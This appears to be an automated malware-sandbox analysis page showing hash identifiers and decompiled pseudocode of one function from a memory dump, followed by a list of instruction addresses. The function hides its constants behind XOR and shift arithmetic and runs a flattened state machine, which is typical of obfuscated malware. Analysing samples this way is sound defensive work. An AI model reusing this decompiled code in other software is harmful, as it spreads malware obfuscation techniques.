Associated: 00000001.00000002.464109148.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectText$Select$CapsClientCollectColorCounterCreateDataDeleteDeviceDrawFontFormattedMetricsQueryRectValue
String ID: %s%d.%d%s$%s%s%s$[N/A]
API String ID: 4229994797-711029782
Opcode ID: 63879ba1dea9d3181cceb7e5e452ec22892f72ef2219f9f1d9f483c78d3f4aa1
Instruction ID: 79b400393478dc686263169434fe2bee906b7b7febe23674e952136164f7186d
Opcode Fuzzy Hash: 63879ba1dea9d3181cceb7e5e452ec22892f72ef2219f9f1d9f483c78d3f4aa1
Instruction Fuzzy Hash: 1E1269719006299FDB24CF28CC80ADAB7B9FF59344F4542D9E509A72A1D730AEE4CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9AC95, Relevance: 23.2, Strings: 18, Instructions: 685
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00C9AC95(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28, signed int* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, signed int _a48) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _t800;
				signed int* _t818;
				signed int _t819;
				signed int _t822;
				void* _t829;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				void* _t842;
				signed int _t843;
				signed int _t858;
				void* _t897;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t918;
				signed int* _t924;
				void* _t928;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28 & 0x0000ffff);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00CB2523(_a28 & 0x0000ffff);
				_v300 = 0xd1cc29;
				_t924 =  &(( &_v308)[0xe]);
				_v300 = _v300 ^ 0xaa9b9a42;
				_v300 = _v300 ^ 0xaa4a566b;
				_v120 = 0xd766cb;
				_t830 = 0;
				_v120 = _v120 >> 5;
				_t915 = 0x3196c07;
				_v120 = _v120 + 0xffffc2b8;
				_v120 = _v120 ^ 0x00067dfd;
				_v232 = 0x851d10;
				_v232 = _v232 >> 4;
				_v232 = _v232 | 0x68ff3af1;
				_v232 = _v232 + 0xa41e;
				_v232 = _v232 ^ 0x690020c7;
				_v64 = 0x5b203f;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 ^ 0x00008b64;
				_v164 = 0x63d511;
				_v164 = _v164 + 0xffffee15;
				_v8 = 0;
				_t913 = 0x4f;
				_v164 = _v164 / _t913;
				_v164 = _v164 ^ 0x00010347;
				_v140 = 0x5208f;
				_v140 = _v140 + 0xffff4186;
				_v140 = _v140 | 0xcae24784;
				_v140 = _v140 ^ 0xcaa66795;
				_v12 = 0xcd4b66;
				_v12 = _v12 + 0xffffb2fc;
				_v12 = _v12 ^ 0x00c8fe62;
				_v172 = 0x1431ee;
				_v172 = _v172 ^ 0xe76300a3;
				_v172 = _v172 >> 9;
				_v172 = _v172 ^ 0x0473bb98;
				_v72 = 0x2a024b;
				_v72 = _v72 + 0xc1b7;
				_v72 = _v72 ^ 0x0022c402;
				_v116 = 0x1a249a;
				_v116 = _v116 | 0x94501829;
				_v116 = _v116 << 0xe;
				_v116 = _v116 ^ 0x8f2ec200;
				_v292 = 0x42fdbe;
				_v292 = _v292 + 0x9503;
				_v292 = _v292 + 0xffff48ca;
				_v292 = _v292 >> 2;
				_v292 = _v292 ^ 0x0010b7e2;
				_v40 = 0x1c76ed;
				_v40 = _v40 << 0xd;
				_v40 = _v40 ^ 0x0edda000;
				_v204 = 0xdf72f6;
				_v204 = _v204 ^ 0x99836ccc;
				_v204 = _v204 >> 6;
				_v204 = _v204 ^ 0x02657078;
				_v256 = 0x7f2be8;
				_v256 = _v256 + 0x8074;
				_v256 = _v256 << 0xb;
				_v256 = _v256 + 0xf869;
				_v256 = _v256 ^ 0xfd63d828;
				_v84 = 0x77dab9;
				_v84 = _v84 | 0x79e4a371;
				_v84 = _v84 ^ 0x79f7fbe6;
				_v68 = 0xc3d915;
				_v68 = _v68 | 0x94a8eb56;
				_v68 = _v68 ^ 0x94ebfb48;
				_v132 = 0x2f5086;
				_v132 = _v132 + 0xffffb583;
				_v132 = _v132 << 6;
				_v132 = _v132 ^ 0x0bc18243;
				_v76 = 0x1fabb3;
				_v76 = _v76 ^ 0x5273c57e;
				_v76 = _v76 ^ 0x526c6fcd;
				_v300 = 0x8e8c49;
				_v300 = _v300 << 0xf;
				_v300 = _v300 ^ 0x46278df7;
				_v300 = 0x8ee475;
				_v300 = _v300 << 1;
				_v300 = _v300 ^ 0x011c9f5b;
				_v304 = 0x7259a2;
				_v304 = _v304 | 0x64804cb6;
				_v304 = _v304 + 0xffffd1cb;
				_v304 = _v304 ^ 0x64f1a62d;
				_v308 = 0x85033;
				_v308 = _v308 >> 1;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x6790e852;
				_v308 = _v308 ^ 0x67933f0e;
				_v304 = 0xb400a4;
				_v304 = _v304 * 0x5f;
				_v304 = _v304 >> 1;
				_v304 = _v304 ^ 0x21614ee0;
				_v300 = 0x4fe69a;
				_v300 = _v300 << 0xa;
				_v300 = _v300 ^ 0x3f941466;
				_v308 = 0xceb94b;
				_v308 = _v308 ^ 0x8a35815d;
				_v308 = _v308 << 2;
				_v308 = _v308 + 0xffff3b89;
				_v308 = _v308 ^ 0x2be914c6;
				_v308 = 0x72b949;
				_v308 = _v308 * 0x5f;
				_v308 = _v308 + 0x856b;
				_v308 = _v308 >> 4;
				_v308 = _v308 ^ 0x02aa6435;
				_v308 = 0x3855ef;
				_v308 = _v308 ^ 0xc26dcfeb;
				_v308 = _v308 >> 9;
				_v308 = _v308 + 0xf615;
				_v308 = _v308 ^ 0x006d0aa6;
				_v304 = 0xf05db3;
				_v304 = _v304 ^ 0xdd1eaeb3;
				_v304 = _v304 | 0xcd57129b;
				_v304 = _v304 ^ 0xddf9e192;
				_v304 = 0xe5d59f;
				_v304 = _v304 >> 3;
				_v304 = _v304 | 0xd82d12eb;
				_v304 = _v304 ^ 0xd830880e;
				_v308 = 0xf96c58;
				_v308 = _v308 ^ 0xcd497794;
				_v308 = _v308 >> 8;
				_v308 = _v308 << 0xe;
				_v308 = _v308 ^ 0x6c0878ec;
				_v112 = 0x549d76;
				_v112 = _v112 | 0xd7795fbc;
				_v112 = _v112 ^ 0x87f0a508;
				_v112 = _v112 ^ 0x50826402;
				_v216 = 0x3f0678;
				_v216 = _v216 + 0x24e9;
				_v216 = _v216 | 0xe5268454;
				_v216 = _v216 >> 4;
				_v216 = _v216 ^ 0x0e538ef0;
				_v224 = 0x2c235d;
				_t239 =  &_v224; // 0x2c235d
				_t832 = 0x54;
				_v224 =  *_t239 / _t832;
				_v224 = _v224 + 0x4b47;
				_v224 = _v224 ^ 0xdeaa23a4;
				_v224 = _v224 ^ 0xdea66806;
				_v108 = 0x63b50d;
				_t833 = 0x75;
				_v108 = _v108 * 0x45;
				_v108 = _v108 ^ 0x1ada951f;
				_v128 = 0x429af;
				_v128 = _v128 / _t833;
				_v128 = _v128 + 0xffff20f8;
				_v128 = _v128 ^ 0xfff26b7c;
				_v16 = 0xcf37d;
				_v16 = _v16 ^ 0xf47dc5d0;
				_v16 = _v16 ^ 0xf47387c1;
				_v196 = 0x7ce77a;
				_v196 = _v196 << 3;
				_v196 = _v196 >> 9;
				_v196 = _v196 ^ 0x00028fc4;
				_v156 = 0x3f887d;
				_v156 = _v156 | 0xf44bd7f3;
				_v156 = _v156 + 0xffff0258;
				_v156 = _v156 ^ 0xf47739ea;
				_v188 = 0x63e935;
				_v188 = _v188 >> 8;
				_v188 = _v188 + 0xffff2425;
				_v188 = _v188 ^ 0xfff73234;
				_v24 = 0x175bba;
				_v24 = _v24 + 0xffffef28;
				_v24 = _v24 ^ 0x00116fa0;
				_v228 = 0x14bf2b;
				_v228 = _v228 ^ 0x9f98aa1b;
				_v228 = _v228 ^ 0xb7a6a3cc;
				_v228 = _v228 ^ 0xda4e4d24;
				_v228 = _v228 ^ 0xf26fd88a;
				_v268 = 0x9ceccb;
				_v268 = _v268 << 0xa;
				_v268 = _v268 + 0xffff08d0;
				_v268 = _v268 * 0x72;
				_v268 = _v268 ^ 0x8554b22a;
				_v88 = 0x5dbfb9;
				_v88 = _v88 >> 1;
				_v88 = _v88 ^ 0x00272228;
				_v244 = 0xfbde6e;
				_v244 = _v244 + 0x5af4;
				_v244 = _v244 + 0xffff3210;
				_v244 = _v244 << 6;
				_v244 = _v244 ^ 0x3ed0ab12;
				_v180 = 0x963ad7;
				_v180 = _v180 ^ 0x7886baab;
				_v180 = _v180 + 0xffff09c9;
				_v180 = _v180 ^ 0x780d68b8;
				_v80 = 0x9e10b0;
				_v80 = _v80 | 0xae2b0e0b;
				_v80 = _v80 ^ 0xaeb5bcb2;
				_v148 = 0x7be7e6;
				_v148 = _v148 << 8;
				_v148 = _v148 | 0x0142ad06;
				_v148 = _v148 ^ 0x7be85494;
				_v280 = 0x367665;
				_v280 = _v280 | 0xfffff67f;
				_v280 = _v280 ^ 0xfff2e53f;
				_v212 = 0xf72381;
				_v212 = _v212 + 0xffff2e4f;
				_v212 = _v212 + 0xffff7b98;
				_v212 = _v212 ^ 0x00f0d936;
				_v208 = 0x723ec;
				_v208 = _v208 | 0xe2e26793;
				_v208 = _v208 * 0x65;
				_v208 = _v208 ^ 0x8545d83d;
				_v124 = 0x1deff5;
				_v124 = _v124 + 0xffffaa6b;
				_v124 = _v124 | 0x9135d2e0;
				_v124 = _v124 ^ 0x91314ff1;
				_v288 = 0x86787e;
				_v288 = _v288 << 3;
				_v288 = _v288 ^ 0x319a621a;
				_t834 = 0x4c;
				_v288 = _v288 / _t834;
				_v288 = _v288 ^ 0x00b47538;
				_v252 = 0x89e0e5;
				_t835 = 0x2c;
				_v252 = _v252 * 0x4f;
				_v252 = _v252 >> 0xd;
				_v252 = _v252 ^ 0x178b4366;
				_v252 = _v252 ^ 0x1787f403;
				_v32 = 0xfdee53;
				_v32 = _v32 ^ 0x2185366e;
				_v32 = _v32 ^ 0x2170250f;
				_v236 = 0x55fc8a;
				_v236 = _v236 + 0x15cc;
				_v236 = _v236 * 0x54;
				_v236 = _v236 * 0x6d;
				_v236 = _v236 ^ 0x066e90b6;
				_v104 = 0xfda392;
				_v104 = _v104 ^ 0x79c4e352;
				_v104 = _v104 ^ 0x793a8fcb;
				_v56 = 0xc91cce;
				_v56 = _v56 + 0xfffff402;
				_v56 = _v56 ^ 0x00c263ba;
				_v272 = 0x5a59b6;
				_v272 = _v272 + 0xffffb917;
				_v272 = _v272 * 0x69;
				_v272 = _v272 << 2;
				_v272 = _v272 ^ 0x93c354db;
				_v184 = 0x8fd0ca;
				_v184 = _v184 + 0xffffa535;
				_v184 = _v184 | 0xf05f6e95;
				_v184 = _v184 ^ 0xf0d33a82;
				_v192 = 0xd967c8;
				_v192 = _v192 / _t835;
				_v192 = _v192 | 0x096317b5;
				_v192 = _v192 ^ 0x09603d64;
				_v100 = 0xae60c5;
				_t836 = 0x4b;
				_v100 = _v100 * 0x39;
				_v100 = _v100 ^ 0x26d44587;
				_v264 = 0x13ecdf;
				_v264 = _v264 / _t836;
				_t837 = 7;
				_v264 = _v264 * 0xa;
				_v264 = _v264 + 0xffff2839;
				_v264 = _v264 ^ 0x000caae0;
				_v168 = 0xe37d7f;
				_v168 = _v168 / _t837;
				_v168 = _v168 | 0x3074f611;
				_v168 = _v168 ^ 0x307de6eb;
				_v92 = 0xe11ed;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x0001b24f;
				_v176 = 0x3811fc;
				_v176 = _v176 + 0x9eb8;
				_v176 = _v176 + 0xffffeb15;
				_v176 = _v176 ^ 0x0034f958;
				_v152 = 0x751569;
				_v152 = _v152 ^ 0xf1367d03;
				_t838 = 0x2a;
				_v152 = _v152 / _t838;
				_v152 = _v152 ^ 0x05b938f5;
				_v160 = 0x826d3e;
				_v160 = _v160 + 0xffff0d45;
				_v160 = _v160 << 9;
				_v160 = _v160 ^ 0x02f1c982;
				_v308 = 0x615de7;
				_t508 =  &_v308; // 0x615de7
				_t839 = 0x32;
				_v308 =  *_t508 * 0x5b;
				_v308 = _v308 + 0xffff0e3a;
				_v308 = _v308 >> 0xc;
				_v308 = _v308 ^ 0x000176ef;
				_v248 = 0x940bff;
				_v248 = _v248 / _t839;
				_v248 = _v248 | 0xf3f710e4;
				_v248 = _v248 / _t839;
				_v248 = _v248 ^ 0x04ec6dcd;
				_v48 = 0xcfc725;
				_v48 = _v48 >> 0xf;
				_v48 = _v48 ^ 0x00010a74;
				_v96 = 0x365da7;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x0002081b;
				_v276 = 0x225d96;
				_v276 = _v276 + 0x2c1;
				_v276 = _v276 / _t913;
				_v276 = _v276 << 6;
				_v276 = _v276 ^ 0x001c07fc;
				_v220 = 0x39c1d0;
				_v220 = _v220 ^ 0x8168a0f4;
				_v220 = _v220 << 3;
				_v220 = _v220 << 0xc;
				_v220 = _v220 ^ 0xb09df3c0;
				_v284 = 0xf9c0bb;
				_v284 = _v284 >> 0xe;
				_v284 = _v284 + 0x14c0;
				_v284 = _v284 << 7;
				_v284 = _v284 ^ 0x000b4193;
				_v20 = 0xc3fb9a;
				_v20 = _v20 + 0x8d16;
				_v20 = _v20 ^ 0x00ccf36e;
				_v240 = 0x8c9adc;
				_v240 = _v240 ^ 0x888f7960;
				_v240 = _v240 + 0xffff62bf;
				_v240 = _v240 + 0xffff86c4;
				_v240 = _v240 ^ 0x880c37e1;
				_v200 = 0xd9fcf3;
				_v200 = _v200 << 4;
				_v200 = _v200 ^ 0xd6e38aec;
				_v200 = _v200 ^ 0xdb711a2e;
				_v260 = 0x11f115;
				_t840 = 0x53;
				_v260 = _v260 / _t840;
				_v260 = _v260 >> 8;
				_v260 = _v260 ^ 0xde7704a7;
				_v260 = _v260 ^ 0xde7b5856;
				_v304 = 0x1851cb;
				_v304 = _v304 ^ 0x0d0756f7;
				_v304 = _v304 + 0x1e91;
				_v304 = _v304 ^ 0x0d150a0a;
				_v136 = 0xc7edb3;
				_v136 = _v136 + 0xffff3700;
				_v136 = _v136 + 0x6375;
				_v136 = _v136 ^ 0x00cba417;
				_v52 = 0x62e7e0;
				_t623 =  &_v52; // 0x62e7e0
				_t841 = 0x23;
				_v52 =  *_t623 / _t841;
				_v52 = _v52 ^ 0x0001b1ca;
				_v144 = 0x12c825;
				_v144 = _v144 >> 0xb;
				_v144 = _v144 << 1;
				_v144 = _v144 ^ 0x0001096e;
				_v300 = 0xe8ad08;
				_v300 = _v300 + 0xffffda27;
				_v300 = _v300 ^ 0x00e4ab5e;
				_v28 = 0x3c1d14;
				_v28 = _v28 | 0xc4f139e0;
				_v28 = _v28 ^ 0xc4f03139;
				_v36 = 0x5a3c12;
				_v36 = _v36 * 0x5f;
				_v36 = _v36 ^ 0x21715166;
				_v44 = 0x139fe3;
				_v44 = _v44 | 0xc7ef95d4;
				_v44 = _v44 ^ 0xc7f6afb5;
				_t914 = _v4;
				_t922 = _v4;
				while(1) {
					L1:
					_t800 = _v296;
					_t842 = 0xd648990;
					while(1) {
						L2:
						_t897 = 0xffd9902;
						while(1) {
							L3:
							_t928 = _t915 - 0xb64b6f6;
							if(_t928 > 0) {
								goto L19;
							}
							L4:
							if(_t928 == 0) {
								_t818 = _a32;
								_t843 =  *_t818;
								__eflags = _t843;
								if(_t843 == 0) {
									_t819 = 0;
									__eflags = 0;
								} else {
									_t819 = _t818[1];
								}
								E00C9A2F6(_t914, _t819, _v48, _v96, _v276, _a44, _t843, _v220, _v284);
								_t924 =  &(_t924[8]);
								asm("sbb esi, esi");
								_t915 = (_t915 & 0x0876ac85) + 0x337366e;
								while(1) {
									L1:
									_t800 = _v296;
									_t842 = 0xd648990;
									goto L2;
								}
							} else {
								if(_t915 == 0x7d36d3) {
									_push(_v128);
									_push(_v204);
									_push(_v108);
									_push(_v224);
									_t822 = E00C9F2CC(_v216);
									_t922 = _t822;
									__eflags = _t822;
									_t915 =  !=  ? 0xffd9902 : 0x2d9c50f;
									E00C92043(0, _v16, _v196, _v156);
									_t924 = _t924 - 0x10 + 0x28;
									_t842 = 0xd648990;
									_t897 = 0xffd9902;
									goto L37;
								} else {
									if(_t915 == 0x1dc854f) {
										E00C954DA(_v300, _v28, _v36, _v44, _t922);
									} else {
										if(_t915 == 0x3196c07) {
											_t915 = 0xb6d7c5f;
											continue;
										} else {
											if(_t915 == 0x337366e) {
												E00C954DA(_v20, _v240, _v200, _v260, _t914);
												_t924 =  &(_t924[3]);
												L12:
												_t915 = 0xbb8862e;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											} else {
												if(_t915 != 0x8f009c2) {
													L37:
													__eflags = _t915 - 0x2d9c50f;
													if(_t915 != 0x2d9c50f) {
														_t800 = _v296;
														continue;
													}
												} else {
													E00CAF83F(_t914, _a16);
													_t915 = 0x337366e;
													_t829 = 1;
													_t830 =  !=  ? _t829 : _t830;
													while(1) {
														L1:
														_t800 = _v296;
														_t842 = 0xd648990;
														L2:
														_t897 = 0xffd9902;
														while(1) {
															L3:
															_t928 = _t915 - 0xb64b6f6;
															if(_t928 > 0) {
																goto L19;
															}
															goto L4;
														}
														goto L19;
													}
												}
											}
										}
									}
								}
							}
							L40:
							return _t830;
							L41:
							L19:
							__eflags = _t915 - 0xb6d7c5f;
							if(_t915 == 0xb6d7c5f) {
								_t915 = 0x7d36d3;
								goto L37;
							} else {
								__eflags = _t915 - 0xbade2f3;
								if(__eflags == 0) {
									__eflags = E00CABC05(_t914, _v120, __eflags) - _v232;
									_t915 =  ==  ? 0x8f009c2 : 0x337366e;
									goto L1;
								} else {
									__eflags = _t915 - 0xbb8862e;
									if(_t915 == 0xbb8862e) {
										E00C954DA(_v304, _v136, _v52, _v144, _t800);
										_t924 =  &(_t924[3]);
										_t915 = 0x1dc854f;
										while(1) {
											L1:
											_t800 = _v296;
											_t842 = 0xd648990;
											goto L2;
										}
									} else {
										__eflags = _t915 - _t842;
										if(_t915 == _t842) {
											__eflags =  *_a32;
											if(__eflags == 0) {
												_t806 = _v8;
											} else {
												_push(_v148);
												_push(0xc91608);
												_v8 = E00C93F5C(_v180, _v80, __eflags);
											}
											_t858 = _v40 | _v292 | _v116 | _v72 | _v172 | _v12 | _v140 | _v164 | _v64;
											_t918 = _a48 & 1;
											__eflags = _t918;
											if(_t918 != 0) {
												__eflags = _t858;
											}
											_t914 = E00C98A5E(_v280, _v296, _v212, _v208, _v124, _v288, _t858, _t858, _t858, _t858, _t806, _t858, _v252, _v32, _v236, _a4);
											E00CB0352(_v104, _v56, _v8, _v272);
											_t924 =  &(_t924[0x10]);
											__eflags = _t914;
											if(_t914 == 0) {
												goto L12;
											} else {
												_v60 = 1;
												E00C953F7( &_v60, _v256, _v184, 4, _v192, _t914, _v100, _v264);
												_t924 =  &(_t924[6]);
												__eflags = _t918;
												if(_t918 != 0) {
													E00C940B0(_v84, _t914, _v168, _v92,  &_v60, _v176,  &_v4);
													_t739 =  &_v60;
													 *_t739 = _v60 | _v76;
													__eflags =  *_t739;
													E00C953F7( &_v60, _v68, _v152, _v4, _v160, _t914, _v308, _v248);
													_t924 =  &(_t924[0xb]);
												}
												_t915 = 0xb64b6f6;
												while(1) {
													L1:
													_t800 = _v296;
													_t842 = 0xd648990;
													goto L2;
												}
											}
											goto L41;
										} else {
											__eflags = _t915 - _t897;
											if(_t915 != _t897) {
												goto L37;
											} else {
												_t800 = E00CB30FB(_a40, _v188, _v24, _v132, _v228, _t922, _t842, _v268, _v88, _a28, _t842, _v244);
												_t924 =  &(_t924[0xc]);
												_v296 = _t800;
												__eflags = _t800;
												_t842 = 0xd648990;
												_t915 =  !=  ? 0xd648990 : 0x1dc854f;
												goto L2;
											}
										}
									}
								}
							}
							goto L40;
						}
					}
				}
			}

0x00c9aca6
0x00c9acb0
0x00c9acb7
0x00c9acbe
0x00c9acc5
0x00c9accc
0x00c9accd
0x00c9acd4
0x00c9acdb
0x00c9ace2
0x00c9ace9
0x00c9acf0
0x00c9acf7
0x00c9acf8
0x00c9acf9
0x00c9acfe
0x00c9ad06
0x00c9ad09
0x00c9ad13
0x00c9ad1d
0x00c9ad28
0x00c9ad2a
0x00c9ad32
0x00c9ad37
0x00c9ad42
0x00c9ad4d
0x00c9ad55
0x00c9ad5a
0x00c9ad62
0x00c9ad6a
0x00c9ad72
0x00c9ad7d
0x00c9ad85
0x00c9ad90
0x00c9ad9b
0x00c9ada6
0x00c9adb6
0x00c9adb9
0x00c9adc0
0x00c9adcb
0x00c9add6
0x00c9ade1
0x00c9adec
0x00c9adf7
0x00c9ae02
0x00c9ae0d
0x00c9ae18
0x00c9ae23
0x00c9ae2e
0x00c9ae36
0x00c9ae41
0x00c9ae4c
0x00c9ae57
0x00c9ae62
0x00c9ae6d
0x00c9ae78
0x00c9ae80
0x00c9ae8b
0x00c9ae93
0x00c9ae9b
0x00c9aea3
0x00c9aea8
0x00c9aeb0
0x00c9aebb
0x00c9aec3
0x00c9aece
0x00c9aed6
0x00c9aede
0x00c9aee3
0x00c9aeeb
0x00c9aef3
0x00c9aefb
0x00c9af00
0x00c9af08
0x00c9af10
0x00c9af1b
0x00c9af26
0x00c9af31
0x00c9af3c
0x00c9af47
0x00c9af52
0x00c9af5d
0x00c9af68
0x00c9af70
0x00c9af7b
0x00c9af86
0x00c9af91
0x00c9af9c
0x00c9afa4
0x00c9afa9
0x00c9afb1
0x00c9afb9
0x00c9afbd
0x00c9afc5
0x00c9afcd
0x00c9afd5
0x00c9afdd
0x00c9afe5
0x00c9afed
0x00c9aff1
0x00c9aff6
0x00c9affe
0x00c9b006
0x00c9b013
0x00c9b017
0x00c9b01b
0x00c9b023
0x00c9b02b
0x00c9b030
0x00c9b038
0x00c9b040
0x00c9b048
0x00c9b04d
0x00c9b055
0x00c9b05d
0x00c9b06a
0x00c9b06e
0x00c9b076
0x00c9b07b
0x00c9b083
0x00c9b08b
0x00c9b093
0x00c9b098
0x00c9b0a0
0x00c9b0a8
0x00c9b0b0
0x00c9b0b8
0x00c9b0c0
0x00c9b0c8
0x00c9b0d0
0x00c9b0d5
0x00c9b0dd
0x00c9b0e5
0x00c9b0ed
0x00c9b0f5
0x00c9b0fa
0x00c9b0ff
0x00c9b107
0x00c9b112
0x00c9b11d
0x00c9b128
0x00c9b133
0x00c9b13b
0x00c9b143
0x00c9b14b
0x00c9b150
0x00c9b15a
0x00c9b162
0x00c9b168
0x00c9b16d
0x00c9b173
0x00c9b17b
0x00c9b183
0x00c9b18b
0x00c9b19e
0x00c9b19f
0x00c9b1a6
0x00c9b1b1
0x00c9b1c5
0x00c9b1cc
0x00c9b1d7
0x00c9b1e2
0x00c9b1ed
0x00c9b1f8
0x00c9b203
0x00c9b20e
0x00c9b216
0x00c9b21e
0x00c9b229
0x00c9b234
0x00c9b23f
0x00c9b24a
0x00c9b255
0x00c9b260
0x00c9b268
0x00c9b273
0x00c9b27e
0x00c9b289
0x00c9b294
0x00c9b29f
0x00c9b2a7
0x00c9b2af
0x00c9b2b7
0x00c9b2bf
0x00c9b2c7
0x00c9b2cf
0x00c9b2d4
0x00c9b2e1
0x00c9b2e5
0x00c9b2ed
0x00c9b2f8
0x00c9b2ff
0x00c9b30a
0x00c9b312
0x00c9b31a
0x00c9b322
0x00c9b327
0x00c9b32f
0x00c9b33a
0x00c9b345
0x00c9b350
0x00c9b35b
0x00c9b366
0x00c9b371
0x00c9b37c
0x00c9b387
0x00c9b38f
0x00c9b39a
0x00c9b3a5
0x00c9b3ad
0x00c9b3b5
0x00c9b3bd
0x00c9b3c5
0x00c9b3cd
0x00c9b3d5
0x00c9b3dd
0x00c9b3e5
0x00c9b3f2
0x00c9b3f6
0x00c9b3fe
0x00c9b409
0x00c9b416
0x00c9b421
0x00c9b42c
0x00c9b434
0x00c9b439
0x00c9b447
0x00c9b44c
0x00c9b452
0x00c9b45a
0x00c9b467
0x00c9b46a
0x00c9b46e
0x00c9b473
0x00c9b47b
0x00c9b483
0x00c9b48e
0x00c9b499
0x00c9b4a4
0x00c9b4ac
0x00c9b4b9
0x00c9b4c2
0x00c9b4c6
0x00c9b4ce
0x00c9b4d9
0x00c9b4e4
0x00c9b4ef
0x00c9b4fa
0x00c9b505
0x00c9b510
0x00c9b518
0x00c9b525
0x00c9b529
0x00c9b52e
0x00c9b536
0x00c9b541
0x00c9b54c
0x00c9b557
0x00c9b562
0x00c9b578
0x00c9b57f
0x00c9b58a
0x00c9b595
0x00c9b5a8
0x00c9b5ab
0x00c9b5b2
0x00c9b5bd
0x00c9b5cd
0x00c9b5d6
0x00c9b5d7
0x00c9b5db
0x00c9b5e3
0x00c9b5eb
0x00c9b5ff
0x00c9b606
0x00c9b611
0x00c9b61c
0x00c9b627
0x00c9b62f
0x00c9b63a
0x00c9b647
0x00c9b652
0x00c9b65d
0x00c9b668
0x00c9b673
0x00c9b687
0x00c9b68c
0x00c9b693
0x00c9b69e
0x00c9b6a9
0x00c9b6b4
0x00c9b6bc
0x00c9b6c7
0x00c9b6cf
0x00c9b6d6
0x00c9b6d9
0x00c9b6dd
0x00c9b6e5
0x00c9b6ea
0x00c9b6f2
0x00c9b702
0x00c9b706
0x00c9b716
0x00c9b71a
0x00c9b722
0x00c9b72d
0x00c9b735
0x00c9b740
0x00c9b74b
0x00c9b753
0x00c9b75e
0x00c9b766
0x00c9b776
0x00c9b77a
0x00c9b77f
0x00c9b787
0x00c9b78f
0x00c9b797
0x00c9b79c
0x00c9b7a1
0x00c9b7a9
0x00c9b7b1
0x00c9b7b6
0x00c9b7be
0x00c9b7c3
0x00c9b7cb
0x00c9b7d6
0x00c9b7e1
0x00c9b7ec
0x00c9b7f4
0x00c9b7fc
0x00c9b804
0x00c9b80c
0x00c9b814
0x00c9b81f
0x00c9b827
0x00c9b832
0x00c9b83d
0x00c9b849
0x00c9b84c
0x00c9b850
0x00c9b855
0x00c9b85d
0x00c9b867
0x00c9b86f
0x00c9b877
0x00c9b87f
0x00c9b887
0x00c9b892
0x00c9b89d
0x00c9b8a8
0x00c9b8b3
0x00c9b8be
0x00c9b8c7
0x00c9b8ca
0x00c9b8d1
0x00c9b8dc
0x00c9b8e7
0x00c9b8ef
0x00c9b8f6
0x00c9b901
0x00c9b909
0x00c9b911
0x00c9b919
0x00c9b924
0x00c9b92f
0x00c9b93a
0x00c9b94d
0x00c9b954
0x00c9b95f
0x00c9b96a
0x00c9b975
0x00c9b980
0x00c9b987
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
0x00c9b997
0x00c9b997
0x00c9b997
0x00c9b99c
0x00c9b99c
0x00c9b99c
0x00c9b9a2
0x00000000
0x00000000
0x00c9b9a8
0x00c9b9a8
0x00c9baa0
0x00c9baa7
0x00c9baa9
0x00c9baab
0x00c9bab2
0x00c9bab2
0x00c9baad
0x00c9baad
0x00c9baad
0x00c9bad9
0x00c9bade
0x00c9bae3
0x00c9baeb
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
0x00000000
0x00c9b992
0x00c9b9ae
0x00c9b9b4
0x00c9ba2f
0x00c9ba39
0x00c9ba40
0x00c9ba47
0x00c9ba5c
0x00c9ba68
0x00c9ba7d
0x00c9ba84
0x00c9ba89
0x00c9ba8e
0x00c9ba91
0x00c9ba96
0x00000000
0x00c9b9b6
0x00c9b9bc
0x00c9bdb8
0x00c9b9c2
0x00c9b9c8
0x00c9ba25
0x00000000
0x00c9b9ca
0x00c9b9d0
0x00c9ba13
0x00c9ba18
0x00c9ba1b
0x00c9ba1b
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
0x00000000
0x00c9b992
0x00c9b9d2
0x00c9b9d9
0x00c9bd8d
0x00c9bd8d
0x00c9bd93
0x00c9bd95
0x00000000
0x00c9bd95
0x00c9b9df
0x00c9b9e8
0x00c9b9ef
0x00c9b9f6
0x00c9b9f7
0x00c9b98e
0x00c9b98e
0x00c9b98e
0x00c9b992
